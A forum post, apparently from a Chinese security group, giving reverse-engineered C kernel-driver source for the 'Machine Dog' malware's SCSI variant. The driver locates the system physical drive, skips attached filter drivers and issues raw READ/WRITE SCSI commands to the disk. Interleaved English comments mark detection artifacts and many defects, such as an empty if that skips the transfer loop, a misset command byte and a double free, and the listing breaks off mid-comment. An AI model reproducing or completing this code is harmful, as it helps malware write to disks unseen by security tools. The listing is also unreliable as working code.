[原创]机器狗SCSI命令版逆向代码
文章作者:Eros412信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
简介:前阵子xIkUg发了个机器狗的SCSI命令版,拿来练习下,:loveliness:[code]//By:Eros412
#include<ntddk.h>
#include<ntdddisk.h>
#include<ntddcdrm.h>
#include<srb.h>
#include<stdio.h>
// Win32-style integer aliases on top of the DDK types.
#define DWORD unsigned long
#define WORD unsigned short
#define BYTE unsigned char
// NOTE(review): BOOLEAN is already a DDK typedef; this macro shadows it with the same 1-byte width.
#define BOOLEAN BYTE
// Control device. DriverUnload deletes it together with its \DosDevices\zzzxxx link; where it is
// created is not part of this listing.
PDEVICE_OBJECT deviceobject;
// File object / device object of the physical drive. Resolved on first I/O by DispatchReadWrite
// (GetPhysicalDriveObject) and released in DriverUnload (DeRefFileObject). Never reset to NULL.
PFILE_OBJECT physdriv_fo;
PDEVICE_OBJECT physdriv_do;
// Closed in DriverUnload; opened outside this listing.
HANDLE dirhand;
// Region of the physical drive that backs one virtual device. Despite the field name, the code reads
// disksize.LowPart as the base sector (mycall) and disksize.HighPart as the sector count (mycall and the
// IOCTL_DISK_GET_DRIVE_GEOMETRY case in DispatchDeviceControl). The other fields are not read here.
typedef struct _DISK_STRUCT {
LARGE_INTEGER disksize;
ULONG unused;
WORD sectorsize;
BYTE byte;
} DISK_STRUCT, *PDISK_STRUCT;
// Not referenced anywhere in the visible code.
typedef struct _INFO_STRUCT {
ULONG byte;
LARGE_INTEGER disksize;
} INFO_STRUCT, *PINFO_STRUCT;
// Device extension of one virtual-disk device. CreateDevice asks IoCreateDevice for 0x27 (39) bytes,
// which is the byte-packed x86 size of these fields; this declaration is not packed, so the hand-coded
// offset used for mylist in CreateDevice only lines up if the build packs the struct -- TODO confirm.
typedef struct _DEVICE_EXTENSION
{
PDISK_STRUCT diskstruct;   // assigned outside this listing; read by mycall and the geometry IOCTL
BOOLEAN media;             // 0 after CreateDevice; DispatchReadWrite/DispatchDeviceControl refuse I/O while 0
BOOLEAN unused;
LIST_ENTRY mylist;         // queue of pending read/write IRPs (DispatchReadWrite -> system_thread_routine)
KSPIN_LOCK spinlock;       // guards mylist (ExInterlocked* list calls)
KEVENT event;              // created with type 1 (SynchronizationEvent); set when an IRP is queued or on stop
PKTHREAD thread;           // worker thread object, referenced in CreateDevice, released in EndThread
BOOLEAN thread_stop;       // set by EndThread; the worker exits when it observes it
} DEVICE_EXTENSION, *PDEVICE_EXTENSION;
// 18-byte sense buffer attached to every SRB built in SendCommand. The field names are the author's and
// do not all follow the SPC fixed-format layout (which keeps the sense key in byte 2); nothing in the
// listing reads the individual fields, so treat it as opaque storage.
typedef struct _SENSE_DATA {
BYTE Valid;
BYTE SegmentNumber;
BYTE FileMark;
BYTE Information[4];
BYTE AdditionalSenseLength;
BYTE CommandSpecificInformation[4];
BYTE AdditionalSenseCode;
BYTE AdditionalSenseCodeQualifier;
BYTE FieldReplaceableUnitCode;
BYTE SenseKeySpecific[3];
} SENSE_DATA, *PSENSE_DATA;
// Local re-declarations of DDK partition/length types and two IOCTL codes, presumably because the
// author's headers lack them (the anonymous union needs a Microsoft extension). Nothing in the visible
// part of the listing uses them.
typedef enum _PARTITION_STYLE {
PARTITION_STYLE_MBR,
PARTITION_STYLE_GPT
} PARTITION_STYLE;
typedef struct _PARTITION_INFORMATION_GPT {
GUID PartitionType;
GUID PartitionId;
ULONG64 Attributes;
WCHAR Name [36];
} PARTITION_INFORMATION_GPT, *PPARTITION_INFORMATION_GPT;
typedef struct _PARTITION_INFORMATION_MBR {
UCHAR PartitionType;
BOOLEAN BootIndicator;
BOOLEAN RecognizedPartition;
ULONG HiddenSectors;
} PARTITION_INFORMATION_MBR, *PPARTITION_INFORMATION_MBR;
typedef struct _PARTITION_INFORMATION_EX {
PARTITION_STYLE PartitionStyle;
LARGE_INTEGER StartingOffset;
LARGE_INTEGER PartitionLength;
ULONG PartitionNumber;
BOOLEAN RewritePartition;
union {
PARTITION_INFORMATION_MBR Mbr;
PARTITION_INFORMATION_GPT Gpt;
};
} PARTITION_INFORMATION_EX, *PPARTITION_INFORMATION_EX;
typedef struct _GET_LENGTH_INFORMATION {
LARGE_INTEGER Length;
} GET_LENGTH_INFORMATION, *PGET_LENGTH_INFORMATION;
#define IOCTL_DISK_GET_LENGTH_INFO CTL_CODE(IOCTL_DISK_BASE, 0x0017, METHOD_BUFFERED, FILE_READ_ACCESS)
#define IOCTL_DISK_GET_PARTITION_INFO_EX CTL_CODE(IOCTL_DISK_BASE, 0x0012, METHOD_BUFFERED, FILE_ANY_ACCESS)
// Drops the reference IoGetDeviceObjectPointer took on the physical drive's file object.
// Both parameters are passed by value, so the NULL assignments only touch the local copies; the
// caller's globals (physdriv_do / physdriv_fo in DriverUnload) keep their old values. Always returns 0.
int DeRefFileObject(PDEVICE_OBJECT DeviceObject, PFILE_OBJECT FileObject){
ObDereferenceObject(FileObject);
DeviceObject=NULL;   // local copy only
FileObject=NULL;     // local copy only
return 0;
}
// Tears down one virtual-disk device: flags its worker thread to stop, wakes it, waits, releases the
// thread reference taken in CreateDevice and deletes the device object. Called by DriverUnload for every
// device on the driver's list. Always returns 0.
int __stdcall EndThread(PDEVICE_OBJECT DeviceObject)
{
PDEVICE_EXTENSION dev_ext=DeviceObject->DeviceExtension;
dev_ext->thread_stop=1;   // system_thread_routine tests this after each wake-up and terminates itself
KeSetEvent(&dev_ext->event,0,0);
// As listed, the object waited on is &dev_ext->thread, i.e. the address of the PKTHREAD field rather
// than the thread object it holds; the dereference on the next line does use the field's value.
KeWaitForSingleObject(&dev_ext->thread,0,0,0,0);
ObDereferenceObject(dev_ext->thread);
IoDeleteDevice(DeviceObject);
return 0;
}
// Unload routine. Removes the control device and its \DosDevices\zzzxxx link, then walks every device
// object owned by this driver: rebuilds its \DosDevices\yyy<N> link name (same encoding as CreateDevice),
// deletes the link and stops/deletes the device through EndThread. Finally releases the directory
// handle and the physical-drive reference. The names touched here are the artifacts a defender can
// look for in the object namespace.
VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
int var=0;          // ordinal in the driver's device list; assumed to equal the DeviceNumber used at creation -- not verifiable here
WORD num;
wchar_t dos_name[30];
PDEVICE_OBJECT dev;
PDEVICE_OBJECT next;
UNICODE_STRING us;
UNICODE_STRING dos_us;
RtlInitUnicodeString(&us,L"\\DosDevices\\zzzxxx");
IoDeleteSymbolicLink(&us);
IoDeleteDevice(deviceobject);
deviceobject=NULL;
dev=DriverObject->DeviceObject;
while(dev)
{
// Suffix <N> after "\DosDevices\yyy" (15 characters): 0-9 as one digit; 10-19 as '1' followed by
// num+0x26 ('0'..'9'); 20 and up as '2' followed by num+0x1C ('0'..'9' for 20-29, non-digits beyond).
wcscpy(dos_name,L"\\DosDevices\\yyy");
num=(WORD )var;
if(var<=9){
num=num+0x30;
dos_name[15]=num;
dos_name[16]=0x00;
}
else if(var<20&&var>9){
dos_name[15]=0x31;
num=num+0x26;
dos_name[16]=num;
dos_name[17]=0x00;
}
else{
dos_name[15]=0x32;
num=num+0x1C;
dos_name[16]=num;
dos_name[17]=0x00;
}
RtlInitUnicodeString(&dos_us,dos_name);
IoDeleteSymbolicLink(&dos_us);
next=dev->NextDevice;   // read before EndThread deletes dev
EndThread(dev);
dev=next;
var++;
}
ZwClose(dirhand);
DeRefFileObject(physdriv_do,physdriv_fo);
}
// Completion routine for the IRPs SendCommand sends to the physical drive. Context is the SRB (see the
// IoSetCompletionRoutine call in SendCommand) but is only tested for non-null. Copies the final status
// into the caller's IO_STATUS_BLOCK, unlocks/frees the MDL SendCommand built, wakes the waiting caller,
// frees the IRP, and returns STATUS_MORE_PROCESSING_REQUIRED so the I/O manager does not touch the
// freed IRP afterwards.
int __stdcall SendCommandCompletion( IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp,IN PVOID Context){
Irp->UserIosb->Status=Irp->IoStatus.Status;
Irp->UserIosb->Information=Irp->IoStatus.Information;
// Both conditions must hold for the MDL to be released (nested if, no braces on the outer one).
if(Context!=0)
if(Irp->MdlAddress){
MmUnlockPages(Irp->MdlAddress);
IoFreeMdl(Irp->MdlAddress);
}
KeSetEvent(Irp->UserEvent,0,0);
IoFreeIrp(Irp);
return STATUS_MORE_PROCESSING_REQUIRED;
}
// Issues one READ(10)/WRITE(10) SCSI command to DeviceObject (the physical-drive device object from
// GetPhysicalDriveObject) by building an SRB and sending it as IRP_MJ_INTERNAL_DEVICE_CONTROL. Because
// the SRB goes straight to that device object, nothing attached above it sees the transfer -- this is
// the behaviour of the sample that monitoring or filtering at the disk/volume level will not observe.
//   MajorFunction   IRP_MJ_READ selects READ(10) with data-in; any other value selects WRITE(10) with data-out.
//   Buffer          caller's data buffer; an MDL is allocated over it and its pages are locked.
//   SectorOffset    32-bit LBA, stored big-endian in CDB bytes 2..5.
//   SendSectorCount number of 512-byte sectors; DataTransferLength = count << 9.
// Returns 0 once the command completed with status 0 or once the retries are exhausted (the final
// failure is not reported), STATUS_INSUFFICIENT_RESOURCES when the SRB/sense/IRP/MDL allocation fails.
// On the `error` path an SRB or sense buffer that was allocated before the other one failed is not freed.
int __stdcall SendCommand(PDEVICE_OBJECT DeviceObject, int MajorFunction, PVOID Buffer, int SectorOffset, int SendSectorCount){
PSCSI_REQUEST_BLOCK srb;
PIO_STACK_LOCATION isl;
PIRP irp;
PMDL mdl;
PSENSE_DATA sense;
ULONG length,length2,TimeOutValue;   // TimeOutValue is never assigned in this function (see the asm block below)
KEVENT event;
IO_STATUS_BLOCK IoStatus;            // filled in by SendCommandCompletion through irp->UserIosb
int trytime=8;                       // retries left; up to 9 attempts in total
int Operation;
int majorfunc=MajorFunction,mj_read=IRP_MJ_READ;
int flags;
int offset,cdb0;
tryhere:
// Pool type 0 = NonPagedPool. Tag 0x206B6444 is the bytes 'D','d','k',' ' -- a pool-tag artifact
// usable when hunting for this driver's allocations in memory.
srb=ExAllocatePoolWithTag(0,sizeof(SCSI_REQUEST_BLOCK),0x206B6444);
sense=ExAllocatePoolWithTag(0,sizeof(SENSE_DATA),0x206B6444);
if(srb==NULL||sense==NULL)
goto error;
RtlZeroMemory(sense,sizeof(SENSE_DATA));
RtlZeroMemory(srb,sizeof(SCSI_REQUEST_BLOCK));
srb->Length=sizeof(SCSI_REQUEST_BLOCK);
srb->Function=SRB_FUNCTION_EXECUTE_SCSI ;
srb->DataBuffer=Buffer;
length=SendSectorCount<<9;   // 512-byte sectors
srb->DataTransferLength=length;
srb->QueueAction= SRB_SIMPLE_TAG_REQUEST;
srb->SrbStatus= SRB_STATUS_PENDING;
srb->ScsiStatus= SRB_STATUS_PENDING;
srb->NextSrb=NULL;
srb->SenseInfoBuffer=sense;
srb->SenseInfoBufferLength=sizeof(SENSE_DATA);
// SrbFlags: al = 0 for a read, 1 otherwise; dec/and/add then yields 0x40 (SRB_FLAGS_DATA_IN) for a read
// or 0x80 (SRB_FLAGS_DATA_OUT) for a write, OR'ed with 0x40000100 (0x100 = SRB_FLAGS_NO_QUEUE_FREEZE and
// a bit in the class-driver-reserved range per srb.h -- verify). Only al is written by setnz; the upper
// 24 bits of eax are whatever the compiler left there.
_asm {
push edi
push esi
mov edi,majorfunc
mov esi,mj_read
cmp edi,esi
setnz al
pop edi
pop esi
dec eax
and eax, 0FFFFFFC0h
add eax, 80h
or eax, 40000100h
mov flags,eax
}
srb->SrbFlags=flags;
if(MajorFunction== IRP_MJ_READ)
srb->SrbFlags|=0x200;   // SRB_FLAGS_ADAPTER_CACHE_ENABLE per srb.h -- verify
// ULONG pointer arithmetic: this ORs 0x20 into the byte 8 bytes past SrbFlags (TimeOutValue in the
// 32-bit SCSI_REQUEST_BLOCK layout -- verify against srb.h), not into byte 2 of SrbFlags.
*(BYTE*)(&srb->SrbFlags+0x02)|=0x20;
length2=sizeof(SCSI_REQUEST_BLOCK);
// Evaluates 2*5*((len & 0xFFFF ? 1 : 0) + (len >> 16)), i.e. 10 for a 64-byte SRB, but the last
// instruction has TimeOutValue as the source operand, so the result is discarded and TimeOutValue is
// still unassigned when it is copied into the SRB below.
_asm{
mov eax,length2
and eax,0xFFFF
neg eax
sbb eax,eax
neg eax
mov ecx,length2
shr ecx,0x10
add eax,ecx
lea eax,[eax+eax*4]
shl eax,1
mov eax ,TimeOutValue
}
srb->TimeOutValue=TimeOutValue;
srb->QueueSortKey=SectorOffset;
srb->CdbLength=0x0A;   // 10-byte CDB
if(MajorFunction!= IRP_MJ_READ)
srb-> Cdb[1]|=0x08;   // bit 3 of WRITE(10) byte 1 (FUA per SBC -- verify)
// CDB bytes 2..5: LBA, big-endian.
offset=SectorOffset;
offset=offset>>0x18;
srb-> Cdb[2]=(BYTE)offset;
offset=SectorOffset;
offset=offset>>0x10;
srb-> Cdb[3]=(BYTE)offset;
offset=SectorOffset;
offset=offset>>0x08;
srb-> Cdb[4]=(BYTE)offset;
srb-> Cdb[5]=(BYTE)SectorOffset;
// CDB bytes 7..8: transfer length. As listed, byte 8 takes the low byte of SectorOffset, not of SendSectorCount.
offset=SendSectorCount;
offset=offset>>0x08;
srb-> Cdb[7]=(BYTE)offset;
srb-> Cdb[8]=(BYTE)SectorOffset;
// Opcode: 2*al + 0x28 in the low byte -> 0x28 READ(10) for a read, 0x2A WRITE(10) otherwise. The upper
// bytes of eax come from SectorOffset and are dropped by the BYTE cast below.
_asm
{
mov eax,SectorOffset
push edi
push esi
mov edi,majorfunc
mov esi,mj_read
cmp edi,esi
setnz al
pop edi
pop esi
lea eax,[eax+eax+0x28]
mov cdb0,eax
}
srb-> Cdb[0]=(BYTE)cdb0;
KeInitializeEvent(&event,0,0);   // type 0 = NotificationEvent
irp=IoAllocateIrp(DeviceObject->StackSize,0);
if(irp==NULL)
goto error;
mdl=IoAllocateMdl(Buffer,length,0,0,irp);
if(mdl==NULL)
goto freepool;
// Operation: 0 for a read, 1 otherwise, passed as the LOCK_OPERATION below (0 = IoReadAccess,
// 1 = IoWriteAccess per wdm.h).
_asm{
xor ecx,ecx
push edi
push esi
mov edi,majorfunc
mov esi,mj_read
cmp edi,esi
setnz cl
mov Operation,ecx
pop edi
pop esi
}
MmProbeAndLockPages(mdl,0,Operation);   // AccessMode 0 = KernelMode
srb->OriginalRequest=irp;
// Hand-built synchronous IRP; the completion routine copies IoStatus here and sets `event`.
irp->UserIosb=&IoStatus;
irp->UserEvent=&event;
irp->IoStatus.Status=0;
irp->IoStatus.Information=0;
irp->Flags= IRP_SYNCHRONOUS_API | IRP_NOCACHE;
irp->AssociatedIrp.SystemBuffer=NULL;
irp->Cancel=0;
irp->RequestorMode=0;   // KernelMode
irp->CancelRoutine=NULL;
irp->Tail.Overlay.Thread=(PETHREAD)KeGetCurrentThread();
// The SRB is delivered to DeviceObject itself as an internal device control with Parameters.Scsi.Srb.
isl=IoGetNextIrpStackLocation(irp);
isl->DeviceObject= DeviceObject;
isl->MajorFunction= IRP_MJ_INTERNAL_DEVICE_CONTROL;
isl->Parameters.Scsi.Srb=srb;
// Context = srb; invoked on success, error and cancel. The routine frees the IRP, so `irp` must not be
// used after IoCallDriver returns.
IoSetCompletionRoutine(irp,SendCommandCompletion,srb,1,1,1);
if(IoCallDriver(DeviceObject,irp)==STATUS_PENDING)
KeWaitForSingleObject(&event,0,0,0,0);
// This condition holds for every non-null SenseInfoBuffer, including `sense` itself; when the lower
// driver left SenseInfoBuffer untouched, the same buffer is freed here and again two statements below.
if(srb->SenseInfoBuffer!=sense||srb->SenseInfoBuffer!=0)
{ExFreePool(srb->SenseInfoBuffer);
}
ExFreePool(srb);
ExFreePool(sense);
// Success, or retries used up: both return 0.
if(IoStatus.Status==0||trytime==0)
return 0;
KeStallExecutionProcessor(1);   // 1 microsecond between attempts
--trytime;
goto tryhere;
freepool:
// MDL allocation failed: no MDL to free on this path.
ExFreePool(srb);
ExFreePool(sense);
IoFreeIrp(irp);
error:
return STATUS_INSUFFICIENT_RESOURCES;
}
// Splits a byte-addressed transfer into SCSI commands of at most 0x100 sectors each and hands them to
// SendCommand against DeviceObject (the physical drive, when called from mycall).
//   MajorFunction  forwarded to SendCommand (IRP_MJ_READ -> READ(10), otherwise WRITE(10)).
//   IoStatus       only written on the end_now path.
//   BytesOffset    byte offset; converted to 512-byte sectors, and only the low 32 bits are used.
//   Buffer, Length data buffer and byte length; Length is converted to sectors in place.
// Returns 1 if a SendCommand call reports failure, 0 otherwise.
// As listed, `if(Buffer==NULL);` has an empty body, so the `goto end_now` that follows is taken
// unconditionally: the loop below is never reached and the function only reports Status 0 with
// Information = the sector count.
int __stdcall DoReadWrite(PDEVICE_OBJECT DeviceObject,UCHAR MajorFunction,PIO_STATUS_BLOCK IoStatus,PLARGE_INTEGER BytesOffset, PVOID Buffer, int Length){
int SendSectorCount;
int SectorOffset;
LARGE_INTEGER offset=*(PLARGE_INTEGER)BytesOffset;
Length=Length>>9;                    // bytes -> sectors
offset.QuadPart=offset.QuadPart>>9;  // bytes -> sectors
SectorOffset=offset.LowPart;         // high 32 bits of the sector number are dropped
if(Buffer==NULL);
goto end_now;
// Chunk size is fixed here and not recomputed for the final chunk, so the last command is issued at the
// full chunk size even when fewer sectors remain.
if(Length>0x100)
SendSectorCount=0x100;
else
SendSectorCount=Length;
while(0<Length){
Length-=SendSectorCount;
if(SendCommand(DeviceObject,MajorFunction,Buffer,SectorOffset,SendSectorCount)!=0)
return 1;
// Advances the buffer (cast-as-lvalue, a Microsoft extension); SectorOffset is not advanced between chunks.
(ULONG)Buffer+=SendSectorCount<<9;
}
return 0;
end_now:
IoStatus->Status=0;
IoStatus->Information=Length;   // already in sectors at this point
return 0;
}
// Worker-thread handler for one read/write IRP on a virtual-disk device: range-checks the request
// against the device's DISK_STRUCT and redirects it to the physical drive (physdriv_do) via DoReadWrite.
//   incoming  the device extension (PDEVICE_EXTENSION); reused below as the data-buffer pointer.
//   param     the IRP.
// Returns the IRP's status after DoReadWrite, or STATUS_IO_DEVICE_ERROR if the request lies outside the
// configured region. The caller (system_thread_routine) overwrites the IRP status afterwards in any case.
int __stdcall mycall(PVOID incoming, PVOID param)
{
LARGE_INTEGER temp;
LARGE_INTEGER bytesoffset;
PIRP IRP=(PIRP)param;
PIO_STACK_LOCATION isl;
PDEVICE_EXTENSION dev_ext;
ULONG readlength;
ULONG offsethighpart;
ULONG highpart;
ULONG test1;
ULONG test2;
dev_ext=(PDEVICE_EXTENSION)incoming;
isl=IoGetCurrentIrpStackLocation(IRP);
// Requested byte offset -> sector, plus the region's base sector (disksize.LowPart). bytesoffset.HighPart
// is used as scratch for that absolute sector number until it is rebuilt below.
temp.QuadPart=isl->Parameters.Read.ByteOffset.QuadPart/0x200;
temp.LowPart+=dev_ext->diskstruct->disksize.LowPart;
bytesoffset.HighPart=temp.LowPart;
// 0x05 = MDL_MAPPED_TO_SYSTEM_VA | MDL_SOURCE_IS_NONPAGED_POOL per wdm.h -- verify. Arguments: KernelMode,
// MmCached, no base address, no bugcheck, NormalPagePriority (16). The mapping result is overwritten by
// MappedSystemVa on the next statement regardless.
if((BYTE)IRP->MdlAddress->MdlFlags==0x05){
incoming=MmMapLockedPagesSpecifyCache(IRP->MdlAddress,0,1,0,0,0x10);
}
incoming=IRP->MdlAddress->MappedSystemVa;
readlength=isl->Parameters.Read.Length;
readlength=readlength>>9;   // bytes -> sectors
offsethighpart=bytesoffset.HighPart;   // first sector requested (absolute)
highpart=dev_ext->diskstruct->disksize.HighPart;   // sector count of the region
test1=dev_ext->diskstruct->disksize.HighPart+dev_ext->diskstruct->disksize.LowPart-1;   // last sector of the region
test2=readlength+offsethighpart-1;   // last sector requested
// Reject when the start is past the region, the end exceeds the bare sector count (compared against
// HighPart alone, not base+count, as written), or the start is below the base sector.
if(offsethighpart>test1||test2>highpart||offsethighpart<dev_ext->diskstruct->disksize.LowPart)
goto end_now;
IRP->IoStatus.Status=0;
IRP->IoStatus.Information=0;
// Physical byte offset passed to DoReadWrite. As listed this adds the sector base (LowPart) to the
// request's low byte offset and then 0x40000 plus the high byte offset into HighPart; the units do not
// match, presumably a decompilation artifact -- TODO confirm against the binary.
bytesoffset.QuadPart=dev_ext->diskstruct->disksize.LowPart+isl->Parameters.Read.ByteOffset.LowPart;
bytesoffset.HighPart+=0x40000+isl->Parameters.Read.ByteOffset.HighPart;
DoReadWrite(physdriv_do,isl->MajorFunction,&IRP->IoStatus,&bytesoffset,incoming,isl->Parameters.Read.Length);
return IRP->IoStatus.Status ;
end_now:
return STATUS_IO_DEVICE_ERROR;
}
// Per-device worker thread started by CreateDevice (Context = the device object). Sleeps on the
// extension's event, exits when EndThread has set thread_stop, otherwise dequeues one IRP, routes
// reads/writes through mycall, and completes the IRP with STATUS_DRIVER_INTERNAL_ERROR irrespective
// of what mycall returned.
VOID __stdcall system_thread_routine(PVOID Context){
PIRP irp;
PLIST_ENTRY entry;
PDEVICE_EXTENSION dev_ext;
PIO_STACK_LOCATION isl;
dev_ext=((PDEVICE_OBJECT)Context)->DeviceExtension;
KeSetPriorityThread(KeGetCurrentThread(),0x10);   // 16 = LOW_REALTIME_PRIORITY per ntddk.h -- verify
for(;;)
{
// The event is created with type 1 (SynchronizationEvent) in CreateDevice, so a satisfied wait
// resets it and one queued IRP is handled per signal.
KeWaitForSingleObject(&dev_ext->event,0,0,0,0);
if(dev_ext->thread_stop)
PsTerminateSystemThread(0);
entry=ExInterlockedRemoveHeadList(&dev_ext->mylist,&dev_ext->spinlock);
if(entry!=0)
{
// Matches the Tail.Overlay.ListEntry insertion in DispatchReadWrite.
irp=CONTAINING_RECORD(entry, IRP, Tail.Overlay.ListEntry);
isl=IoGetCurrentIrpStackLocation(irp);
if(isl->MajorFunction==IRP_MJ_READ||isl->MajorFunction==IRP_MJ_WRITE)
{
irp->IoStatus.Information=0;
mycall(dev_ext,irp);
}
// Unconditional: every dequeued IRP is completed as an internal error with 0 bytes transferred.
irp->IoStatus.Status=STATUS_DRIVER_INTERNAL_ERROR;
irp->IoStatus.Information=0;
IoCompleteRequest(irp,0);
}
}
}
// Creates virtual-disk device number DeviceNumber: \Device\zzz\zzz<N> with the DOS link
// \DosDevices\yyy<N> (the encoding DriverUnload reverses), a 0x27-byte extension, DO_DIRECT_IO, an IRP
// queue and a worker thread. Returns 0 on success, 1 when device, link or thread creation fails.
// A FILE_DEVICE_DISK object with these names and no PnP stack beneath it is a straightforward thing
// for a defender to enumerate.
int __stdcall CreateDevice(PDRIVER_OBJECT DriverObject, int DeviceNumber){
wchar_t dev_name[30];
wchar_t dos_name[30];
UNICODE_STRING dev_us;
UNICODE_STRING dos_us;
PDEVICE_OBJECT dev_ob;
NTSTATUS status;
PDEVICE_EXTENSION dev_ext;
ULONG addr;
HANDLE thread_hand;
WORD num=(WORD )DeviceNumber;
// Both prefixes are 15 characters; <N> goes at index 15: one digit for 0-9, '1' plus num+0x26 for
// 10-19, '2' plus num+0x1C for 20 and up (digits only up to 29).
wcscpy(dev_name,L"\\Device\\zzz\\zzz");
wcscpy(dos_name,L"\\DosDevices\\yyy");
if(num<=9){
num=num+0x30;
dev_name[15]=dos_name[15]=num;
dev_name[16]=dos_name[16]=0x00;
}
else if(num<20&&num>9){
dev_name[15]=dos_name[15]=0x31;
num=num+0x26;
dev_name[16]=dos_name[16]=num;
dev_name[17]=dos_name[17]=0x00;
}
else{
dev_name[15]=dos_name[15]=0x32;
num=num+0x1C;
dev_name[16]= dos_name[16]=num;
dev_name[17]=dos_name[17]=0x00;
}
RtlInitUnicodeString(&dev_us,dev_name);
RtlInitUnicodeString(&dos_us,dos_name);
// DbgPrint("%S %S",dev_us.Buffer,dos_us.Buffer);
// Extension size 0x27 (39) = byte-packed x86 size of DEVICE_EXTENSION; FILE_DEVICE_DISK, no
// characteristics, not exclusive.
if(IoCreateDevice(DriverObject,0x27,&dev_us, FILE_DEVICE_DISK,0x00,0x00,&dev_ob)!=0)
return 1;
dev_ob->Flags|=0x10;   // DO_DIRECT_IO: read/write IRPs carry an MDL, which mycall relies on
dev_ext=dev_ob->DeviceExtension;
dev_ext->media=0;   // I/O is refused until something outside this listing sets it
if(IoCreateSymbolicLink(&dos_us,&dev_us)!=0){
IoDeleteDevice(dev_ob);
return 1;
}
// Hand-rolled InitializeListHead: Flink = Blink = extension + 6, which is &mylist only if diskstruct,
// media and unused occupy bytes 0..5 with no padding (packed layout) -- TODO confirm.
addr=(ULONG)dev_ext;
addr+=6;
dev_ext->mylist.Blink=(LIST_ENTRY*)addr;
dev_ext->mylist.Flink=dev_ext->mylist.Blink;
KeInitializeSpinLock(&dev_ext->spinlock);
KeInitializeEvent(&dev_ext->event,1,0);   // type 1 = SynchronizationEvent, initially not signalled
dev_ext->thread_stop=0;
if(PsCreateSystemThread(&thread_hand,0,0,0,0,system_thread_routine,dev_ob)!=0){
IoDeleteDevice(dev_ob);
return 1;
}
// 0x1F03FF = THREAD_ALL_ACCESS in pre-Vista headers -- verify. On failure the thread is told to stop
// and the handle closed; control then falls through to the unconditional ZwClose below and the
// function still returns 0.
if(ObReferenceObjectByHandle(thread_hand,0x1F03FF,0,0,&dev_ext->thread,0)!=0){
dev_ext->thread_stop=1;
ZwClose(thread_hand);
KeSetEvent(&dev_ext->event,0,0);
}
ZwClose(thread_hand);
return 0;
}
// Determines which PhysicalDrive<N> holds the system installation so GetPhysicalDriveObject can open it.
// Returns 0x40000000 as an "unknown" sentinel (also when called above PASSIVE_LEVEL or when the ARC
// link cannot be opened/queried), 0 when the machine has exactly one disk, otherwise the number parsed
// from a \Device\Harddisk<N> style name.
int GetSystemDriveIndex(){
BYTE drive_char;
HANDLE link_handle;   // never closed on any path
ANSI_STRING ansi;
UNICODE_STRING us,us2;
OBJECT_ATTRIBUTES oa;
DWORD result=0x40000000;
NTSTATUS status;
ULONG ret;
PCONFIGURATION_INFORMATION config_info;
if(KeGetCurrentIrql()>0)
return 0x40000000;
config_info=IoGetConfigurationInformation();
if(config_info->DiskCount==1)
return 0;
// ARC name of the first disk on the first controller.
RtlInitUnicodeString(&us,L"\\arcname\\multi(0)disk(0)rdisk(0)");
// OBJECT_ATTRIBUTES filled by hand: Length 0x18 = sizeof on x86; Attributes 0x50 =
// OBJ_CASE_INSENSITIVE | OBJ_PERMANENT per ntdef.h -- verify.
oa.Length=0x18;
oa.RootDirectory=0x00;
oa.Attributes=0x50;
oa. ObjectName=&us;
oa.SecurityDescriptor=0x00;
oa.SecurityQualityOfService=0x00;
if(ZwOpenSymbolicLinkObject(&link_handle, GENERIC_READ,&oa))
return result;
// us2 is used as the output buffer for the link target: RtlInitUnicodeString sizes MaximumLength from
// this literal, and the literal's storage in the image is what gets written.
RtlInitUnicodeString(&us2,L"\\device\\harddisk000\\partition000\\winnt");
if(ZwQuerySymbolicLinkObject(link_handle,&us2,&ret))
return result;
// As listed, the string converted and parsed is `us` (the ARC name), not `us2` (the resolved target).
// Indices 0x10/0x11 are the characters just after "\device\harddisk" (16 characters) in the target
// format, i.e. the disk number's first digit and either its second digit or the following '\'.
RtlUnicodeStringToAnsiString(&ansi,&us,1);
if(ansi.Buffer[0x11]=='\\')
{
// Single-digit disk number.
drive_char=ansi.Buffer[0x10];
drive_char-=0x30;
result=drive_char;
RtlFreeAnsiString(&ansi);
return result;
}
// Two-digit disk number: ones digit from 0x11; the tens character at 0x10 is multiplied by 10
// without first subtracting '0', as written.
drive_char=ansi.Buffer[0x11];
drive_char-=0x30;
result=drive_char;
drive_char=ansi.Buffer[0x10];
drive_char*=0x0A;
drive_char+=(BYTE)result;
result=drive_char;
RtlFreeAnsiString(&ansi);
return result;
}
// Resolves the system physical drive for SendCommand. Builds \GLOBAL??\PhysicalDrive<N>, falling back
// to \??\PhysicalDrive<N>, where N comes from GetSystemDriveIndex (single digit only; 0 when unknown),
// and opens it with FILE_READ_ATTRIBUTES. Returns 0 on success, 1 if neither name resolves.
// IoGetDeviceObjectPointer yields the top of the named device's stack (per the WDK docs); the final
// statement replaces that with FileObject->DeviceObject, the object the file was opened on, so any
// device objects attached above it -- filter drivers included -- are not on the path SendCommand uses.
// That substitution is the detection-relevant line of this function. The reference on *FileObject is
// held until DriverUnload releases it through DeRefFileObject.
int GetPhysicalDriveObject(PDEVICE_OBJECT *DeviceObject, PFILE_OBJECT *FileObject)
{
ULONG index;
UNICODE_STRING us;
wchar_t globaldrivex[30];
wchar_t drivex[30];
index=GetSystemDriveIndex();
if(index== 0x40000000)
index=0;   // unknown -> PhysicalDrive0
// "\GLOBAL??\PhysicalDrive" is 23 characters, "\??\PhysicalDrive" is 17; the digit goes right after.
wcscpy(globaldrivex,L"\\GLOBAL??\\PhysicalDrive");
globaldrivex[23]=(WORD)index+0x30;
globaldrivex[24]=0;
wcscpy(drivex,L"\\??\\PhysicalDrive");
drivex[17]=(WORD)index+0x30;
drivex[18]=0;
RtlInitUnicodeString(&us,globaldrivex);
if(IoGetDeviceObjectPointer(&us,FILE_READ_ATTRIBUTES,FileObject,DeviceObject))
{
RtlInitUnicodeString(&us,drivex);
if(IoGetDeviceObjectPointer(&us,FILE_READ_ATTRIBUTES,FileObject,DeviceObject))
return 1;
}
*DeviceObject=(*FileObject)->DeviceObject;
return 0;
}
// IRP_MJ_CREATE / IRP_MJ_CLOSE handler: completes every request with STATUS_SUCCESS and Information = 1.
// IofCompleteRequest is the fastcall entry behind IoCompleteRequest; priority boost 0.
NTSTATUS DispatchCreateClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){
Irp->IoStatus.Status=0;
Irp->IoStatus.Information=1;
IofCompleteRequest(Irp,0);
return 0;
}
// IRP_MJ_READ / IRP_MJ_WRITE handler for the virtual-disk devices. Refuses I/O while dev_ext->media is
// 0 (the IRP is completed with whatever status it already carries), resolves the physical drive on
